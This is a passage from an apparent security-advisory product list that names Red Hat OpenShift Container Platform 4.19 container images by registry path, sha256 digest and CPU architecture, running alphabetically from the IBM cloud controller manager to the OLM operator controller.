"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
